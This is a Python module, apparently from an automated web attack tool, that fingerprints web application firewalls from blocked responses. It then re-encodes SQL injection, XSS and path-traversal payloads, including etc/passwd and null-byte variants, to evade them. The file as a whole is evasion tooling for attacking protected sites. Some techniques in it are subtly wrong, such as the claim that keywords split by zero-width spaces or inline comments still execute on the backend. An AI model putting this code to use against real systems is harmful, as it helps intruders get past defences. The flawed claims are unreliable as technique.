"""WAF detection and payload re-encoding for Phase 6: WAF Bypass.

When a payload returns 403/406/429, check the response for WAF signatures.
If a WAF is detected, re-encode the payload with bypass variants and retry.
"""

from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set
from urllib.parse import quote, quote_plus


# ── WAF signature patterns ─────────────────────────────────────────────

WAF_SIGNATURES: Dict[str, List[str]] = {
    "cloudflare": [
        r"cf-ray",
        r"cloudflare",
        r"__cfduid",
        r"cf_clearance",
        r"Attention Required.*cloudflare",
        r"Checking your browser.*cloudflare",
    ],
    "akamai": [
        r"akamai",
        r"_akamai_",
        r"Reference #[\d]+",
        r"AkamaiGHost",
    ],
    "aws_waf": [
        r"x-amzn-waf",
        r"awswaf",
        r"x-amzn-requestid",
    ],
    "modsecurity": [
        r"mod_security",
        r"modsecurity",
        r"NOYB",
        r"This error was generated by Mod_Security",
    ],
    "incapsula": [
        r"incap_ses",
        r"_incap_",
        r"Incapsula",
    ],
    "sucuri": [
        r"sucuri",
        r"Access Denied.*sucuri",
    ],
    "barracuda": [
        r"barracuda",
        r"Barracuda.*Web Application Firewall",
    ],
    "fortiweb": [
        r"fortiweb",
        r"FortiWeb",
    ],
    "denied_patterns": [
        r"Access Denied",
        r"Request Rejected",
        r"Security Violation",
        r"Blocked by.*WAF",
        r"403 Forbidden",
        r"not accepted",
        r"Malicious Request",
    ],
}


@dataclass
class WAFInfo:
    """Detected WAF information for a route."""
    waf_name: str
    confidence: float  # 0.0 - 1.0
    blocked_status: int  # the HTTP status that triggered detection


@dataclass
class WAFTracker:
    """Tracks WAF presence per route and provides payload re-encoding."""
    # Route → WAF info
    _waf_cache: Dict[str, WAFInfo] = field(default_factory=dict)
    # Routes where WAF is confirmed
    _waf_routes: Set[str] = field(default_factory=set)

    def detect(self, url: str, status: int, body: str, headers: Dict[str, str]) -> Optional[WAFInfo]:
        """Check if a response indicates WAF blocking.

        Returns WAFInfo if a WAF is detected, None otherwise.
        """
        # Only check on block-like statuses
        if status not in (403, 406, 429, 419, 420, 429):
            return None

        # Already known WAF on this route
        if url in self._waf_cache:
            return self._waf_cache[url]

        # Check response body and headers for WAF signatures
        check_text = body + " " + " ".join(f"{k}: {v}" for k, v in headers.items())

        for waf_name, patterns in WAF_SIGNATURES.items():
            if waf_name == "denied_patterns":
                continue
            for pattern in patterns:
                if re.search(pattern, check_text, re.IGNORECASE):
                    info = WAFInfo(
                        waf_name=waf_name,
                        confidence=0.9,
                        blocked_status=status,
                    )
                    self._waf_cache[url] = info
                    self._waf_routes.add(url)
                    return info

        # Generic denied patterns — lower confidence
        for pattern in WAF_SIGNATURES.get("denied_patterns", []):
            if re.search(pattern, check_text, re.IGNORECASE):
                info = WAFInfo(
                    waf_name="generic_waf",
                    confidence=0.6,
                    blocked_status=status,
                )
                self._waf_cache[url] = info
                self._waf_routes.add(url)
                return info

        return None

    def is_waf_blocked(self, url: str) -> bool:
        """Check if a route has been confirmed as WAF-blocked."""
        return url in self._waf_routes

    def get_waf(self, url: str) -> Optional[WAFInfo]:
        """Get cached WAF info for a route."""
        return self._waf_cache.get(url)


def reencode_payload(payload: str, strategy: str = "auto") -> str:
    """Re-encode a payload for WAF bypass.

    Strategies:
    - url: URL-encode special characters
    - double: Double URL-encode
    - unicode: Unicode alternatives
    - case: Case variation
    - mixed: Combine multiple strategies
    - auto: Try the most effective strategy based on payload type
    """
    if strategy == "url":
        return _url_encode(payload)
    elif strategy == "double":
        return _double_encode(payload)
    elif strategy == "unicode":
        return _unicode_encode(payload)
    elif strategy == "case":
        return _case_variation(payload)
    elif strategy == "mixed":
        return _mixed_encode(payload)
    elif strategy == "auto":
        return _auto_encode_strategy(payload)
    return payload


def _auto_encode_strategy(payload: str) -> str:
    """Choose the best re-encoding strategy based on payload content."""
    # SQL keywords → Unicode or comment injection
    sql_keywords = ["SELECT", "UNION", "INSERT", "UPDATE", "DELETE", "DROP"]
    has_sql = any(kw.upper() in payload.upper() for kw in sql_keywords)
    if has_sql:
        return _unicode_encode(payload)
    # Path traversal → URL encode
    if "../" in payload or "\\.." in payload:
        return _url_encode(payload)
    # Script/JS → case variation
    if any(kw in payload.lower() for kw in ["script", "alert", "eval", "document"]):
        return _mixed_encode(payload)
    # Default: URL encode
    return _url_encode(payload)


def get_bypass_variants(payload: str) -> List[str]:
    """Generate multiple bypass variants of a payload.

    Returns a list of re-encoded payloads to try when the original is blocked.
    """
    variants = []

    # Strategy 1: URL-encode special characters
    url_encoded = _url_encode(payload)
    if url_encoded != payload:
        variants.append(url_encoded)

    # Strategy 2: Double URL-encode
    double_encoded = _double_encode(payload)
    if double_encoded != payload and double_encoded != url_encoded:
        variants.append(double_encoded)

    # Strategy 3: Case variation (for keywords like SELECT, UNION, etc.)
    case_varied = _case_variation(payload)
    if case_varied != payload:
        variants.append(case_varied)

    # Strategy 4: Unicode alternatives
    unicode_varied = _unicode_encode(payload)
    if unicode_varied != payload:
        variants.append(unicode_varied)

    # Strategy 5: Mixed encoding
    mixed = _mixed_encode(payload)
    if mixed != payload and mixed not in variants:
        variants.append(mixed)

    # Strategy 6: Null byte injection (for path traversal)
    if "../" in payload or "etc/passwd" in payload:
        null_variant = payload.replace("../", "..%00/")
        if null_variant != payload:
            variants.append(null_variant)

    # Strategy 7: Comment injection (for SQL keywords)
    if any(kw in payload.upper() for kw in ["SELECT", "UNION", "INSERT", "UPDATE", "DELETE", "DROP"]):
        comment_variant = _sql_comment_inject(payload)
        if comment_variant != payload:
            variants.append(comment_variant)

    return variants[:6]  # Cap at 6 variants to avoid excessive retries


# ── Encoding helpers ───────────────────────────────────────────────────

def _url_encode(payload: str) -> str:
    """URL-encode special characters but keep alphanumeric and basic chars."""
    # Encode <, >, ', ", (, ), spaces, and other injection chars
    special_chars = set("<>'\"();:=&+*%#@!{}[]\\|^~`")
    result = []
    for ch in payload:
        if ch in special_chars or ord(ch) > 127:
            result.append(f"%{ord(ch):02X}")
        else:
            result.append(ch)
    return "".join(result)


def _double_encode(payload: str) -> str:
    """Double URL-encode — % becomes %25."""
    single = _url_encode(payload)
    return single.replace("%", "%25")


def _unicode_encode(payload: str) -> str:
    """Replace common SQL/JS keywords with Unicode alternatives.

    Inserts zero-width characters or uses Unicode escapes to break
    WAF pattern matching while the backend still interprets the query.
    """
    # Use case-insensitive replacements
    replacements = [
        (r"(?i)SELECT", "SEL\u200bECT"),   # zero-width space
        (r"(?i)UNION", "UNI\u200bON"),
        (r"(?i)INSERT", "INS\u200bERT"),
        (r"(?i)UPDATE", "UPD\u200bATE"),
        (r"(?i)DELETE", "DEL\u200bETE"),
        (r"(?i)DROP", "DR\u200bOP"),
        (r"(?i)SCRIPT", "SCR\u200bIPT"),
        (r"(?i)alert", "al\u200bert"),
        (r"(?i)eval", "ev\u200bal"),
        (r"(?i)document", "docu\u200bment"),
    ]
    result = payload
    for pattern, replacement in replacements:
        result = re.sub(pattern, replacement, result, count=1)
    return result


def _case_variation(payload: str) -> str:
    """Alternate case for SQL/JS keywords."""
    import random
    result = []
    for ch in payload:
        if ch.isalpha():
            # 50/50 upper or lower for each letter in keywords
            result.append(ch.upper() if random.random() > 0.5 else ch.lower())
        else:
            result.append(ch)
    return "".join(result)


def _mixed_encode(payload: str) -> str:
    """Combine URL encoding with case variation."""
    url_encoded = _url_encode(payload)
    return _case_variation(url_encoded)


def _sql_comment_inject(payload: str) -> str:
    """Inject SQL comments into keywords to bypass WAF pattern matching."""
    # SELECT → SEL/**/ECT
    # UNION → UN/**/ION
    replacements = {
        "SELECT": "SEL/**/ECT",
        "UNION": "UN/**/ION",
        "INSERT": "INS/**/ERT",
        "UPDATE": "UPD/**/ATE",
        "DELETE": "DEL/**/ETE",
        "DROP": "DR/**/OP",
    }
    result = payload
    for keyword, replacement in replacements.items():
        result = result.replace(keyword, replacement)
    return result
